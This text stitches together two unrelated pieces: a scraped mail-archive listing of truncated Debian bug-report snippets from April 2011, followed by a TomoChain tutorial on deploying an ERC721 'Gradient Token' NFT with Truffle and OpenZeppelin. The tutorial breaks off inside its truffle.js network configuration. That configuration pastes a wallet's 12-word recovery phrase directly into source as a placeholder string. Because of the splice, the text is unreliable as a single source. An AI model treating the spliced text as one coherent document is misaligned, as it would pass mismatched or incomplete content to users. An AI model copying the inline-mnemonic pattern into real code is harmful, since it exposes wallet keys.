Package: initscripts Version: 2.88dsf-13.2 Severity: normal mountpoint(1) fails to report bind-mounts from within the same device: $ mkdir foo bar $ sudo mount --bind foo bar $ touch foo/baz $ ls bar/ baz $ mountpoint bar bar is not a mountpoint Greetings Marc -- To UNSUBSCRIBE, email to
Bug#622593: Moose dependency
I forgot to add that this is needed by Moose v2.. Cheers -- perl -E'$_=q;$/= @{[@_]};and s;\S+;inidehG ordnasselA;eg;say~~reverse' -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#574774: a little help
Hello, Heimdal version is 1.4.0~git20100726.dfsg.1-1+b1, running on amd64 arch. The KDC is installed freshly, the strange thing is that this is the 2nd kdc I've installed with the same config (for testing purposes) and the first one is working, the second one has this problem. The krb5 and
Bug#612725: radiotray: more missing dependencies
Package: radiotray Severity: normal my radiotray 0.6.3-1 also needs gstreamer0.10-plugins-good and gstreamer0.10-plugins-ugly or ist starts with the known error. -- System Information: Debian Release: 6.0.1 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500,
Bug#622596: hpijs-ppds: Uninstallable due to not binNMU safe
Package: hpijs-ppds Version: 3.11.1-2 Severity: serious Justification: Policy 7.2 Hi hpijs-ppds cannot be installed anymore since the binNMU as it has a strict versioned dependency on hpijs which version has changed by the binNMU. Please make the package binNMU safe by loosening the dependency
Bug#595427: wnpp: ITP: winetricks -- Quick and dirty script for WINE
FYI, The package has been uploaded to NEW queue Jari -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#622251: pu: package python-apt/0.7.100.1+squeeze1
On Di, 2011-04-12 at 19:32 +0100, Adam D. Barratt wrote: On Tue, 2011-04-12 at 08:55 +0200, Julian Andres Klode wrote: On Mo, 2011-04-11 at 19:20 +0100, Adam D. Barratt wrote: +- strip multiarch by default in RealParseDepends +- add optional parameter to allow parse_depends() to
Bug#622597: openoffice.org-writer: Copy from a heading erroneously copies the (unselected) heading number also
Package: openoffice.org-writer Version: 1:3.3.0-8 Severity: normal This is a regression in copying, it wasn'tt like this before. Example: I have a document with the heading 1.2 Multiprotocol label switching and want to copy that in order to paste it into another editor (LyX). I select the
Bug#622569: still ships rules files in /etc/udev/
On Apr 13, David Paleino da...@debian.org wrote: I can't see /etc/ here? md@bongo:~$ dpkg -L libgphoto2-2 | grep udev /lib/udev /lib/udev/rules.d /lib/udev/rules.d/60-libgphoto2-2.rules /etc/udev/libgphoto2_generic_ptp_support.rules md@bongo:~$ dpkg -l libgphoto2-2
Bug#622598: hplip: depends on libsane-hpaio 3.11.1-2 instead of 3.11.1-2+b1
Package: hplip Version: 3.11.1-2+b1 Severity: grave Justification: renders package unusable hplip 3.11.1-2+b1 depends on libsane-hpaio 3.11.1-2 instead of 3.11.1-2+b1 thus cannot be installed. -- Package-specific info: error: NOT FOUND! This is a REQUIRED/RUNTIME ONLY dependency. Please make
Bug#622599: udav: Update to new upstream version
Source: udav Version: 0.6.3-2 Severity: wishlist I would like to wait for it until mathgl builds again on all architectures. -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-5-amd64 (SMP
Bug#604174: ITP: mysql-workbench-gpl -- MySQL Database diagramming and development tool
Hi Norber On Thu, Dec 23, 2010 at 10:01, Norbert Tretkowski norb...@tretkowski.de wrote: we're already working on a package, the current state is available in our Subversion repository: I saw you keep updating this repo, which is
Bug#622600: Please transition to libchamplain 0.8
Package: claws-mail-geolocation-plugin Version 3.7.8-1 Severity: normal Tags: patch Hi, Transition to libchamplain 0.8 is currently in progress[1]. Could you please apply the attached patch and update build-dependency to build against libchamplain 0.8 Thanks Laurent Bigonville [1]
Bug#622597: openoffice.org-writer: Copy from a heading erroneously copies the (unselected) heading number also
reassign 622597 libreoffice-writer found 622597 1:3.3.1-1 thanks On Wed, Apr 13, 2011 at 11:12:55AM +0200, Helge Hafting wrote: Package: openoffice.org-writer Version: 1:3.3.0-8 Severity: normal Why do you file this against the dummy package instead of the real one? I think it should be
Bug#579001: closed by Carl Chenet cha...@ohmytux.com (Bug#579001: fixed in nagstamon 0.9.5-1)
Hi Carl, although it would be great if this bug can really be closed, I have doubts – on the upstream bugtracker, the entry was closed by some clean-up routine, not because the bug has been fixed. Did you verify that this feature has indeed been implemented? Greetings, Joachim Am Mittwoch, den
Bug#592719: floppy mount problem caused by udisks-daemon
Hello, When udisks-daemon is running floppy drive cannot be mounted. The daemon causes the drive to unmount automatically. The daemon seems to monitor /dev/fd0 and unmounts it if any attempt is made to mount it. If I add 1 more floppy (/dev/fd1) then the floppy can be mounted manually with the
Bug#553359: Any progress on darktable?
Sorry for nagging, but is there any progress for darktable? I have seen lcms2 hang in ftp-master for about a month or two, and then suddenly disappear. Any hope to get darktable into Debian? I have heard it is a really good raw converter, and would like to try it out. TIA /ralph -- To
Bug#598983: another idea for saving the settings
Hi, It seems upstream wants that you can save multiple configurations. What do you think about this idea (based in yours)?: 1.- If you save the settings, the default file would be ~/.gpsprune/.pruneconfig. 2.- If ~/.gpsprune/.pruneconfig exists, it would be the default configuration. 3.- If
Bug#622601: New upstream version
Package: bluetile Version: 0.5.1-2 Severity: normal It looks like two new minor upstream versions were released long time ago. It would be really interesting to have them in Debian too: Can you please take care of uploading 0.5.3? Thanks a lot, Luca
Bug#622602: binNMU is not installable
Package: hplip Version: 3.11.1-2+b1 Severity: grave feivel:~# aptitude install hplip-gui hplip libsane-hpaio The following NEW packages will be installed: hplip{b} hplip-cups{a} hplip-data{a} hplip-gui{b} libsane-hpaio 0 packages upgraded, 5 newly installed, 0 to remove and 7 not upgraded.
Bug#609787: augeas: New upstream release
retitile 609787 New upstream release: 0.8.0 thanks New 0.8.0 release is available. Any news on this? Regards, -- Alessio Treglia | Debian Developer | ales...@debian.org Ubuntu Core Developer | quadris...@ubuntu.com 0FEC 59A5 E18E E04F 6D40 593B 45D4
Bug#600953: gpsprune: Gpsprune simply aborts
Please, could you confirm if this bug is still present using gpsprune/12.1-2? (I can't reproduce it, either :-( ) Thanks for your collaboration! signature.asc Description: This is a digitally signed message part
Bug#622573: [iceowl-extension] iceowl-extension incompatible with icedove
I can also confirm this issue on my workstation. Here are my iceowl and icedove versions: $ dpkg -s iceowl-extension Package: iceowl-extension Status: install ok installed Priority: optional Section: web Installed-Size: 4752 Maintainer: Alexander Sack a...@debian.org Architecture: amd64 Source:
Bug#622584: XB-Python-Version: header and broken grammar in long description
Hi Uwe, First of all thank you for your report. El mié, 13-04-2011 a las 09:20 +0200, Uwe Kleine-König escribió: Package: trac-privateticketsplugin Version: 2.0.3-1 Severity: minor Hello, debian/control contains an indented line reading XB-Python-Version: ${python:Versions} which is
Bug#604721: [Build-common-hackers] Bug#604721: please add support for Python 3
hence different namespace. Patch was applied (and extensively
Bug#622603: callout with callout absolute pointer stopped working
Package: pgf Version: 2.10-1 Severity: normal Hi, thanks for maintaining pgf. As of 2.10-1, using callout absolute pointer stopped working. It did work fine with 2.00-1. Attached is a test-case. Cheers, Stefan. -- System Information: Debian Release: wheezy/sid APT prefers unstable APT
Bug#622604: demote openssh-blacklist dependency to recommendation
Package: openssh-server Version: 1:5.5p1-6 Severity: wishlist Hi, I propose to demote the hard dependency on openssh-blacklist to a Recommends. It's better to be safe than sorry, and the Recommends ensures that by default the blacklist is still installed. However those users that are certain
Bug#621913: dictionaries-common: Dictionaries-common won't configure because no, dictionary is selected
On Tue, Apr 12, 2011 at 08:44:26PM +0200, Bertrand Marc wrote: Hi, Thank you for your answer, I had no access to my linux box these days. I don't have any word list from ispell installed since I don't use ispell. I use myspell-fr-gut (or hunspell-fr) and aspell-fr-gut. Here is the log of
Bug#622352: /sbin/udevd: error writing to queue file: No space left on device
On Apr 13, Ralf Hildebrandt ralf.hildebra...@charite.de wrote: I recompiled 2.6.39-rc3 and 2.6.38.2 with the same options; 2.6.38.2 is giving me no problems regarding udevd, 2.6.39-rc3 is exposing the behaviour. See attached screenshot. To better understand what is happening you can boot with
Bug#622605: gnome-packagekit crashes when I push the apply button to install packages
Package: gnome-packagekit Version: 2.32.0-2 Severity: grave Justification: renders package unusable I installed gnome-packagekit, just to se how it works compared to synaptic. Each time I tryed to install packages after having seleced them, the program crashes. Apt-get and synaptic work as
Bug#621775: timelimit: Consider a few signal names.
package timelimit tag 621775 + upstream pending thanks On Fri, Apr 08, 2011 at 08:33:46PM +0200, Mats Erik Andersson wrote: Package: timelimit Version: 1.7-3 Severity: wishlist Could the maintainer consider, in one of his roles, to supplement the source code with the capability to
Bug#622603: maybe-fixed in CVS?
Hi, just looked a little bit further, this seems to be reported already at. A quick glimpse at cvs suggests that it might even be fixed there:
Bug#620276: Tr : calendar-google-provider: modifying the attendees list of an existing event is not possible
Hello, After further investigation, I have remarked that this problem is not as bad as it seems, it is more a display matter than a functional one. It is indeed still possible to have access to the attendees list and do modifications by maximizing the attendees window (trying to moving further
Bug#519931: sends welcome E-mail when 'submod' is enabled
Package: mlmmj Severity: normal Tags: patch looks like the original submitter never got around to a patch, and the problem is still present in version 1.2.17-2. recently i've run into the same (two) problems and so i've created a patch fixing them; would you please forward the patch upstream,
Bug#607181: Fix FTBFS with ld --as-needed
tags 607181 pending thanks On Mon, 2011-04-11 at 10:56 -0400, Adam C Powell IV wrote: On Mon, 2011-04-11 at 15:40 +0200, PICCA Frédéric-Emmanuel wrote: Hello, I debcheckout freecad. I attached the build log 1) it seemsm that you did not push the upstream/0.11 tag so a
Bug#621358: on logging out and in again kded4 (often?) loops on the CPU
Package: kdelibs-bin Version: 4:4.6.1-0r3 Followup-For: Bug #621358 Reproduced here. George Kiagiadakis asked to take a backtrace of all the threads, so here it is: (gdb) thread apply all bt Thread 4 (Thread 0x7fb49246e700 (LWP 8758)): #0 0x7fb4a9aabc73 in select () at
Bug#622325: DNS323 RTC-M41T80 starting with Kernel 2.6.38-orion5x (still there in 2.6.38.2) / seems to be introduced with RTC-REWORK
The formerly found bug seems to be introduced with the RTC-rework starting with kernel 2.6.38. It seems to be NOT a bug of I2C- or LM75-driver! The bug starts with kernel 2.6.38 and is still there in 2.6.38.2. Kernel 2.6.37.6 runs fine No RTC-bug here!!! [ 18.270364] i2c /dev entries
Bug#622606: xserver-xorg-video-r128: [regression] [powerpc] X dies with SIGBUS if I tell it UseFBDev false
X-Debbugs-CC: debian-powe...@lists.debian.org Package: xserver-xorg-video-r128 Version: 6.8.1-5 Severity: important Hi there. This is a PowerPC (iBook G3), with a R128 video card and with a very recent kernel (2.6.38), all from Debian, none compiled by me. As per bug #484015 (see my comments
Bug#622038: lingot: FTBFS: lingot-audio-jack.c:180:28: error: 'JackPortIsActive' undeclared (first use in this function)
Yes, the build dep is properly set to libjack-jackd2-dev in the debian package, but there is a bug in the source code, in the configure.in file (line 66) PKG_CHECK_MODULES(JACK, jack = 0.102.0) Therefore you can download the source and try to compile against libjack-dev version 1:0.102. The
Bug#604721: [Build-common-hackers] Bug#604721: Bug#604721: please add support for Python 3
Hi Piotr, On 11-04-13 at 12:20pm, Piotr Ożarowski wrote:
Bug#622607: cyrus-common has circular Depends on cyrus-common-2.2|cyrus-common-2.4
Package: cyrus-common Version: 2.4.7-6 Severity: important Hello Debian Cyrus Team, There is a circular dependency between cyrus-common and cyrus-common-2.2|cyrus-common-2.4: cyrus-common:Depends: cyrus-common-2.4 (= 2.4.7-6~) | cyrus-common-2.2 (= 2.2.13p1-5~) cyrus-common-2.2
Bug#622309: udev: Network, sound and X input broken
On Tuesday, 12 April 2011 at 4:45, Marco d'Itri wrote: It makes a difference if you have a /run directory. Do you have one *now*? If you do, rm -rf /run/udev/ and reboot. Removing /run completely helped. I'm not sure why it was there, but since just by existing it breaks udev, maybe whatever
Bug#622608: zsh-beta: typeset -T shouldn't fail if reused without changing the config
Package: zsh-beta Version: 4.3.11-dev-1+20110401-1 Severity: minor There's a regression compared to zsh 4.3.11: ypig% typeset -Tx FOO foo ypig% typeset -Tx FOO foo typeset: can't tie already tied scalar: FOO typeset -T shouldn't fail if it is reused without changing the configuration of the
Bug#622610: wireless-tools: Dell D620 iwl3945 will not associate with AP in squeeze
Package: wireless-tools Version: 30~pre9-5 Severity: important Tags: squeeze -- System Information: Debian Release: 6.0.1 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.32-5-686 (SMP w/2 CPU cores) Locale:
Bug#620191: initscripts: [patch] Please support top-level /run
On Wed, Apr 13, 2011 at 01:02:02AM +0100, Roger Leigh wrote: On Fri, Apr 08, 2011 at 10:52:48AM +0100, Roger Leigh wrote: I've attached an updated patch; exactly the same as before, but with a couple of typos in comments fixed (thanks to Michael Biebl for reviewing it). Updated patch
Bug#622580: sylpheed: FTBFS for +b1: /usr/bin/ld: compose.o: undefined reference to symbol 'enchant_broker_list_dicts'
tags 622580 fixed-upstream thanks Hi KiBi, On Wed, Apr 13, 2011 at 09:09:53AM +0200, Cyril Brulebois wrote: Source: sylpheed Version: 3.1.0-1 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round with: [...] | /usr/bin/ld: compose.o: undefined
Bug#622591: crash in ChertVersion::create
On Wed, Apr 13, 2011 at 04:36:41AM -0400, Joey Hess wrote: Package: libsearch-xapian-perl Version: 1.2.3.0-1 Severity: normal It seems likely this is in xapian-core, or as you say perhaps libuuid. But I'll leave it for now rather than playing package tennis. I have a reproducible segfault in
Bug#622585: libgl1-mesa-dri: chromium google body without body, z/stencil buffer (2) too small (0x3FFFFC01 1048576 1 4 - 268435456 have 4096)
On Mit, 2011-04-13 at 11:20 +0400, Sergey Burladyan wrote: Package: libgl1-mesa-dri Version: 7.10.2-1 Severity: normal Open with chromium 10.0.648.204~r79063-1 i see no 3D and have this messages in dmesg: [ 104.139125] radeon :04:00.0:
Bug#622371: transition: webkit
Mehdi Dogguy wrote:
Bug#622611: zsh: use alternatives for man pages?
Package: zsh Version: 4.3.11-4 Severity: wishlist I wonder whether alternatives should be used for man pages. The zsh4 prefix would be used for zsh, the zsh-beta prefix would be used for zsh-beta, and the zsh prefix would be used for the default. One of the current problems is that run-help zsh
Bug#599167: patch applied
Patch applied in SVN. Ciao! Carlo -- .' `. | Registered Linux User #443882 |a_a | | .''`. \_)__/ +--- : :' : /( )\ ---+ `. `'` |\`/\
Bug#622612: [INTL:es] Spanish debconf template translation for xsp
Package: xsp Version: 2.10-1 Severity: wishlist Tags: l10n patch -- Saludos Fran # xsp po-debconf translation to Spanish # Copyright (C) 2007, 2009, 2011 Software in the Public Interest, SPI Inc. # This file is distributed under the same license as the xsp package. # # Changes: # - Initial | https://www.mail-archive.com/search?l=debian-bugs-dist%40lists.debian.org&q=date:20110413&o=newest | CC-MAIN-2019-30 | en | refinedweb |
#include <sys/ddi.h>
#include <sys/sunddi.h>

int ddi_dma_addr_setup(dev_info_t *dip, struct as *as, caddr_t addr,
    size_t len, uint_t flags, int (*waitfp)(caddr_t), caddr_t arg,
    ddi_dma_lim_t *lim, ddi_dma_handle_t *handlep);
This interface is obsolete. ddi_dma_addr_bind_handle(9F) should be used instead.
A pointer to the device's dev_info structure.
A pointer to an address space structure. Should be set to NULL, which implies kernel address space.
Virtual address of the memory object.
Length of the memory object in bytes.
Flags that would go into the ddi_dma_req structure (see ddi_dma_req(9S)).
The address of a function to call back later if resources aren't available now. The special function addresses DDI_DMA_SLEEP and DDI_DMA_DONTWAIT (see ddi_dma_req(9S)) are taken to mean, respectively, wait until resources are available, or do not wait at all and do not schedule a callback.
Argument to be passed to a callback function, if such a function is specified.
A pointer to a DMA limits structure for this device (see ddi_dma_lim_sparc(9S) or ddi_dma_lim_x86(9S)). If this pointer is NULL, a default set of DMA limits is assumed.
Pointer to a DMA handle. See ddi_dma_setup(9F) for a discussion of handle.
The ddi_dma_addr_setup() function is an interface to ddi_dma_setup(9F). It uses its arguments to construct an appropriate ddi_dma_req structure and calls ddi_dma_setup(9F) with it.
See ddi_dma_setup(9F) for the possible return values for this function.
The ddi_dma_addr_setup() function can be called from user, interrupt, or kernel context, except when waitfp is set to DDI_DMA_SLEEP, in which case it cannot be called from interrupt context.
See attributes(5) for a description of the following attributes:
attributes(5), ddi_dma_buf_setup(9F), ddi_dma_free(9F), ddi_dma_htoc | https://docs.oracle.com/cd/E36784_01/html/E36886/ddi-dma-addr-setup-9f.html | CC-MAIN-2019-30 | en | refinedweb |
URL: <>
Summary: KBHIT(1) should return immediately. It takes 8+ hours instead
Project: GNU Octave
Submitted by: deego
Submitted on: Sat 08 Dec 2018 03:27:20 AM UTC
Category: Octave Function
Severity: 3 - Normal
Priority: 5 - Normal
Item Group: Unexpected Error
Status: None
Assigned to: None
Originator Name: deego
Originator Email:
Open/Closed: Open
Discussion Lock: Any
Release: 4.2.2
Operating System: GNU/Linux
_______________________________________________________
Details:

Your giant computation takes 30 days, so (1) You want to plot the results intermittently, so you are stuck with using the qt-toolkit.[1] (2) If the user presses "T", your running program wishes to detect the keypress, and do certain actions [save work, terminate gracefully, etc.] (3) Unfortunately, you occasionally do have to go home to shower during these 30 days, and for security, you have to allow the screensaver to lock the screen when you go home.

Your boss is strange and thinks that those are a pretty reasonable minimal set of requirements your program should have. Here's an SSCCE that shows how kbhit(1) hangs forever when you try these things:

(a) Debian Stable, self-compiled octave 4.22, xfce4.
(b) Start octave --no-gui [which uses qt by default] and run the SSCCE below: yyybug008. You start hearing a beep and see a plot after every intermediate result. Better yet, start several octaves.
(c) That's it. Configure xfce4 to lock the monitor within 1 minute. Disable *all* hibernating/sleeping. Indeed, your other scripts - including octave ones - keep working during the monitor-sleep, confirming that your system was alive and kicking all this time!
(d) Wait a minute and your screen locks. Almost immediately, you stop hearing any beeps. Wait up to 1-5 minutes if you still hear them.
(e) Unlock the screen after the beeps stop or after you take that shower. Each octave has errored out because it detected that kbhit(1) was hung instead of returning immediately.
I have seen hangs of 8 hours - or however long I leave the screen locked. Thus, all work stops when the screen locks. :(

[1] If you use any other toolkit, then the plotted figure either doesn't show till the end of 30 days, or if it does, it gets lost very easily: You alt-tab or switch workspace, and you now have a blank figure.

function yyybug008();
  while true;
    for mmm=1:100;
      ig = __kbhitcheck;
    endfor
    plot(rand(1,2), rand(1,2));
    hold off;
    pause(2+rand());
    system("beep");
  endwhile
endfunction

function out = __kbhitcheck;
  ticcer = tic();
  out = kbhit(1);
  timetaken = toc(ticcer);
  if timetaken > 1;
    error(sprintf("kbhit(1) should have taken negligible time, but took %f seconds.", timetaken));
  endif
endfunction

_______________________________________________________
Reply to this item at: <>
_______________________________________________
Message sent via Savannah
How to deploy NFT tokens on TomoChain
Create your unique ERC721 tokens (e.g. CryptoKitties) on TomoChain!
This article will explain:
- What is a Non-Fungible Token (NFT)
- Use-cases of NFT
- How to deploy an NFT token on TomoChain, step by step
What is a Non-Fungible Token (NFT)?
Fungible tokens are all equal and interchangeable. For instance, dollars, Bitcoins, 1 kilogram of pure gold, or ERC20 tokens. All TOMO coins are equivalent too: they are the same and have the same value. They are interchangeable 1:1. This is a fungible token.
Non-fungible tokens (NFTs) are all distinct and special. Every token is rare, with unique attributes and a different value. For instance: CryptoKitty tokens, collectible cards, airplane tickets or real art paintings. Every item has its own characteristics and specifics and is clearly distinguishable from any other. They are not interchangeable 1:1. They are distinguishable.
Think of Non-Fungible Tokens (NFT) as a rare collectible on the TomoChain network. Every token has unique characteristics, its own metadata and special attributes
Non-Fungible Tokens (NFT) are used to create verifiable digital scarcity. NFTs are unique and distinctive tokens that you can mainly find on EVM blockchains.
ERC-721 is the standard interface for Non-Fungible Tokens (but there are also other NFT standards, like ERC-1155). ERC721 is a set of rules that makes your NFT easy for other people / apps / contracts to interface with.
ERC721 is a free, open standard that describes how to build non-fungible or unique tokens on EVM compatible blockchains. While most tokens are fungible (not distinguishable), ERC721 tokens are all unique, with individual identities and properties. Think of them like rare, one-of-a-kind collectables — each unit is a unique item with its own serial number.
ERC20: identical tokens. ERC721: unique tokens
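The distinction can be sketched in a few lines of plain JavaScript. This is only an illustration of the two ledger shapes — real tokens live inside smart contracts, and the names and balances below are invented for the example:

```javascript
// Fungible ledger (ERC20-style): one balance number per address.
// Any two units are interchangeable, so only the amount matters.
const fungible = { alice: 100, bob: 50 };

function transferFungible(ledger, from, to, amount) {
  if ((ledger[from] || 0) < amount) throw new Error("insufficient balance");
  ledger[from] -= amount;
  ledger[to] = (ledger[to] || 0) + amount;
}

// Non-fungible ledger (ERC721-style): one owner per token id.
// Each token is distinct, so ownership is tracked per id.
const owners = { 1: "alice", 2: "alice", 3: "bob" };

function transferNFT(ledger, from, to, tokenId) {
  if (ledger[tokenId] !== from) throw new Error("not the owner");
  ledger[tokenId] = to;
}

transferFungible(fungible, "alice", "bob", 30); // any 30 units will do
transferNFT(owners, "alice", "bob", 2);         // token #2 specifically

console.log(fungible.alice, fungible.bob); // 70 80
console.log(owners[2]);                    // bob
```

Notice that the fungible transfer never mentions *which* units move, while the NFT transfer must name the exact token id — that is the whole difference between the two standards.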
Some high-demand non-fungible token applications are CryptoKitties, Decentraland, CryptoPunks, and many others.
CryptoKitties
At the end of 2017, NFTs made a remarkable entrance into the blockchain world with the success of CryptoKitties. Each one is a unique collectible item, with its own serial number, which can be compared to its DNA card. This unleashed an unprecedented interest in NFTs, which went so far as to clog the Ethereum network. The CryptoKitties market alone generated $12 million in two weeks after its launch, and over $25 million in total. Some rare cryptokitties were even sold for 600 ETH ($170,000).
The strength of NFTs resides in the fact that each token is unique and cannot be mistaken for another one, unlike bitcoins, for example, which are interchangeable with one another.
Crypto Item Standard (ERC-1155)
One step further in the non-fungible token space is the ERC-1155 Standard proposed by the Enjin team, also known as the “Crypto Item Standard”. This is an improved version of ERC-721 which will actually be suitable for platforms where there are tens of thousands of digital items and goods.
Online games can have up to 100,000 different digital items. The current problem with ERC-721 is that if we would like to tokenize all those 100,000 items, then we would need to deploy 100,000 separate smart contracts.
ERC-1155 standard combines ERC-20 and ERC-721 tokens in its smart contract. Each token is saved in the contract with a minimal set of data that distinguishes it from others. This allows for the creation of bigger collections which contain multiple different items.
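The "one contract, many item types" idea behind ERC-1155 can be sketched in plain JavaScript: a single ledger keyed by token id, where one id can be a fungible currency and another a one-of-a-kind item. The ids, balances and helper names below are invented for illustration:

```javascript
// ERC-1155 sketch: one contract tracks many token ids at once.
// An id can be fungible (many identical units) or effectively
// non-fungible (total supply of exactly 1).
// Shape: balances[tokenId][address] -> amount
const balances = {
  gold:   { alice: 1000, bob: 250 }, // fungible in-game currency
  sword7: { alice: 1 },              // unique item: total supply 1
};

function balanceOf(id, who) {
  return (balances[id] && balances[id][who]) || 0;
}

function safeTransfer(from, to, id, amount) {
  if (balanceOf(id, from) < amount) throw new Error("insufficient");
  balances[id][from] -= amount;
  balances[id][to] = balanceOf(id, to) + amount;
}

safeTransfer("alice", "bob", "gold", 100); // pay 100 gold
safeTransfer("alice", "bob", "sword7", 1); // hand over the unique sword

console.log(balanceOf("gold", "bob"));   // 350
console.log(balanceOf("sword7", "bob")); // 1
```

With this layout a game with 100,000 item types needs one ledger (one contract), not 100,000 separate deployments — which is the problem the ERC-1155 proposal addresses.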
Use-cases of Non-Fungible Tokens (NFT)
Most of the time when people think about ERC-721 or NFT, they refer to the most notably successful CryptoKitties. But there are many other usability applications for NFT contracts:
- Software titles or software licences to guarantee anti-piracy, privacy and transferability — like Collabs.io
- Betting in real time on the outcome of a video game being live-streamed
- Gaming in general is an important field of experimentation and development for the uses of NFT in the future. TomoChain is having mini contests for games on blockchain, and is welcoming all developers to build blockchain games
- Concert tickets and sports match tickets can be tokenized and name-bound, preventing fraud and at the same time offering fans an option to have a single place where to collect all their past event experiences
- Digital Art (or physical art!) has already entered the game and showed an important usage of ERC721. Digital art auctions were the first application and still are the first thought of non-fungible token standards. The auctions organized by Christie’s revealed the appeal of the public for crypto-collectibles. Several digital art assets were sold during this event, the high point being the sale of the ‘Celestial Cyber Dimension’, an ERC721 CryptoKitty piece of art, for $140,000
- Real Estate assets, to carry out transfers of houses, land and other ‘tokenized’ properties through smart contracts
- Financial instruments like loans, burdens and other responsibilities, or a futures contract to buy 1,000 barrels of oil for $60k on May 1
- KYC compliance check to verify users. Receiving a specific NFT token in your wallet similar to the blue checkmark ☑️ on Twitter — like Wyre
- and more…
Crypto-Collectibles are more than a passing craze. It is easy to see the reason why, especially when you look at the potential of the crypto-collectible technology, including: securing digital ownership, protecting intellectual property, tracking digital assets and overall creating real world value.
How to deploy an NFT token on TomoChain
This article will create a basic ERC721 token using the OpenZeppelin implementation of the ERC721 standard. Look at the links in order to familiarize yourself with the requirements as they can sometimes be hidden in the excellent OpenZeppelin ERC721 implementations.
The assets that your ERC721 tokens (NFT) represent will influence some of the design choices for how your contract works, most notably how new tokens are created.
- You can have an initial supply of tokens defined during token creation
- You can have a function, only callable by the contract creator (or others, if you allow this), that issues new tokens when called
For example, in CryptoKitties, players are able to “breed” their Kitties, which creates new Kitties (tokens). However, if your ERC721 token represents something more tangible, like concert tickets, you may not want token holders to be able to create more tokens. In some cases, you may even want token holders to be able to “burn” their tokens, effectively destroying them.
Let’s Start the NFT Tutorial
We will now implement an NFT collectible token, like CryptoKitties but with simpler logic.
You’ll learn how to create non-fungible tokens, how to write tests for your smart contracts and how to interact with them once deployed.
We’ll build non-fungible collectibles: gradient tokens. Every token will be represented as a unique CSS gradient and will look somewhat like this:
1. Creating a new project
Create a new directory and move inside it. Then start a new Truffle project:
mkdir nft-tutorial
cd nft-tutorial
truffle init
We will use the OpenZeppelin ERC721 implementation, which is quick and easy and broadly used. Install OpenZeppelin in the current folder:
npm install openzeppelin-solidity
2. Preparing your TOMO wallet
Create a TOMO wallet. Then grab a few tokens:
TomoChain (testnet): Get free tokens from faucet (grab ~60 TOMO)
TomoChain (mainnet): You will need real TOMO from exchanges
Go to Settings menu, select Backup wallet and then Continue. Here you can see your wallet’s private key and the 12-word recovery phrase.
Write down your 12-word recovery phrase.
3. Writing the Smart Contract
3.1 GradientToken.sol
We’ll be extending now the OpenZeppelin ERC721 token contracts to create our Gradient Token.
- Go to
contracts/folder and create a new file called
GradientToken.sol
- Copy the following code
pragma solidity ^0.5.4;import 'openzeppelin-solidity/contracts/token/ERC721/ERC721Full.sol';
import 'openzeppelin-solidity/contracts/ownership/Ownable.sol';// NFT Gradient token
// Stores two values for every token: outer color and inner colorcontract GradientToken is ERC721Full, Ownable {
using Counters for Counters.Counter;
Counters.Counter private tokenId;
struct Gradient {
string outer;
string inner;
}
Gradient[] public gradients; constructor(
string memory name,
string memory symbol
)
ERC721Full(name, symbol)
public
{}
// Returns the outer and inner colors of a token
function getGradient( uint256 gradientTokenId ) public view returns(string memory outer, string memory inner){
Gradient memory _gradient = gradients[gradientTokenId]; outer = _gradient.outer;
inner = _gradient.inner;
} // Create a new Gradient token with params: outer and inner
function mint(string memory _outer, string memory _inner) public payable onlyOwner {
uint256 gradientTokenId = tokenId.current();
Gradient memory _gradient = Gradient({ outer: _outer, inner: _inner });
gradients.push(_gradient);
_mint(msg.sender, gradientTokenId);
tokenId.increment();
}
}
We inherited from two contracts: ERC721Full to make it represent a non-fungible token, and from the Ownable contract.
Every token will have a unique
tokenId, like a serial number. We also added two attributes:
inner and
outer to save CSS colors.
Ownable allows managing authorization. It assigns ownership to deployer (when the contract is deployed) and adds modifier onlyOwner that allows you to restrict certain methods only to contract owner. Also, you can transfer ownership. You can approve a third party to spend tokens, burn tokens, etc.
Our solidity code is simple and I would recommend a deeper dive into the ERC-721 standard and the OpenZeppelin implementation.
You can see the functions to use in OpenZeppelin ERC721 here and here.
You can find another ERC721 smart contract example by OpenZeppelin here.
4. Config Migrations
4.1 Create the migration scripts
In the
migrations/ directory, create a new file called
2_deploy_contracts.js and copy the following:
const GradientToken = artifacts.require("GradientToken");module.exports = function(deployer) {
const _name = "Gradient Token";
const _symbol = "GRAD";
return deployer
.then(() => deployer.deploy(GradientToken, _name, _symbol));
};
This code will deploy or migrate our contract to TomoChain, with the name
Gradient Token and the symbol
GRAD.
4.2 Configure truffle.js
Now we set up the migrations: the blockchain where we want to deploy our smart contract, specify the wallet address to deploy, gas, price, etc.
1. Install Truffle’s
HDWalletProvider, a separate npm package to find and sign transactions for addresses derived from a 12-word
mnemonic.
npm install truffle-hdwallet-provider
2. Open
truffle.js file (
truffle-config.js on Windows). You can edit here the migration settings: networks, chain IDs, gas... You have multiple networks to migrate your ICO, you can deploy: locally,
ganache, public
Ropsten (ETH) testnet,
TomoChain (testnet),
TomoChain (Mainnet), etc…
Both Testnet and Mainnet network configurations are described in the official TomoChain documentation — Networks. We need the
RPC endpoint, the
Chain id and the
HD derivation path.
Replace the
truffle.js file with this new content:
const HDWalletProvider = require('truffle-hdwallet-provider');
const infuraKey = "a93ffc...<PUT YOUR INFURA-KEY HERE>";// const fs = require('fs');
// const mnemonic = fs.readFileSync(".secret").toString().trim();
const mnemonic = '<PUT YOUR WALLET 12-WORD RECOVERY PHRASE HERE>';module.exports = { networks: {
// Useful for testing. The `development` name is special - truffle uses it by default
development: {
host: "127.0.0.1", // Localhost (default: none)
port: 8545, // Standard Ethereum port (default: none)
network_id: "*", // Any network (default: none)
}, // Useful for deploying to a public network.
// NB: It's important to wrap the provider as a function.
ropsten: {
//provider: () => new HDWalletProvider(mnemonic, `{infuraKey}`),
provider: () => new HDWalletProvider(
mnemonic,
`{infuraKey}`,
0,
1,
true,
"m/44'/889'/0'/0/", // Connect with HDPath same as TOMO
), deploying to TomoChain testnet
tomotestnet: {
provider: () => new HDWalletProvider(
mnemonic,
"",
0,
1,
true,
"m/44'/889'/0'/0/",
),
